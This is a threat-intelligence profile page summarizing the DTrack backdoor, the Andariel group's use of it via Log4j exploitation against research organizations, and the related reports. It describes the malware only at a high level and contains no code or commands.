Dtrack Backdoor

Malware Profile Updated 13 days ago
Download STIX
Preview STIX
The DTrack backdoor is a malicious software (malware) primarily used by the Andariel group, a cybercriminal entity known for its sophisticated cyberattacks. The malware infects Windows machines by executing a Log4j exploit, which downloads additional harmful software from a command-and-control (C2) server. This method of infection allows the Andariel group to gain unauthorized access to systems and networks, often without the victim's knowledge. The group's primary tool in these exploits is the long-established DTrack malware, which has been linked to various high-profile cyberattacks. In 2022, the Andariel group leveraged the widespread Log4j vulnerability to deploy the DTrack backdoor and other post-exploitation malware onto networks belonging to organizations in various scientific research fields, including biomedical, genetics, soil sciences, and energy. For instance, they executed the Maui ransomware attack using the DTrack backdoor by exploiting the Log4j vulnerability. The group utilized new infrastructure during this period, such as exclusive use of IP addresses with no domain names, a modified version of the DTrack backdoor, and a novel variant of the Grease malware. Despite concerted efforts by cybersecurity experts, the initial pieces of malware downloaded from the C2 server were not captured. However, researchers observed that the exploitation was closely followed by the download of the DTrack backdoor. This sequence of events indicates that the DTrack backdoor is typically deployed as a secondary payload, following an initial breach or compromise. The Andariel group continues to pose a significant threat to information security due to their use of the DTrack backdoor and other advanced cyberattack techniques.
What's your take? (Question 1 of 2)
Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
IDVotesProfile Description
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Malware
Exploit
Log4j
Associated Malware
To see the evidence that has resulted in this association, create a free account
IDTypeVotesProfile Description
No associations to display
Associated Threat Actors
To see the evidence that has resulted in this association, create a free account
IDTypeVotesProfile Description
No associations to display
Associated Vulnerabilities
To see the evidence that has resulted in this association, create a free account
IDTypeVotesProfile Description
No associations to display
Source Document References
Information about the Dtrack Backdoor Malware was read from the documents corpus below. This display is limited to 20 results, create a free account to see more
SourceCreatedAtTitle
CERT-EU
9 months ago
IT threat evolution Q2 2023
CERT-EU
a year ago
Lazarus, Scarcruft North Korean APTs Shift Tactics, Thrive
CERT-EU
a year ago
Kaspersky crimeware report: Andariel’s mistakes and EasyRat malware
CERT-EU
a year ago
Log4j bug exploited to push novel EarlyRat malware
CERT-EU
a year ago
Andariel APT Hackers Drop a New Malware On Windows Via Weaponized MS Word Doc
InfoSecurity-magazine
a year ago
Lazarus Group Attack Identified After Operational Security Fail
Securityaffairs
a year ago
North Korean Andariel APT used a new malware named EarlyRat
BankInfoSecurity
a year ago
New Malware by Lazarus-Backed Andariel Group Exploits Log4j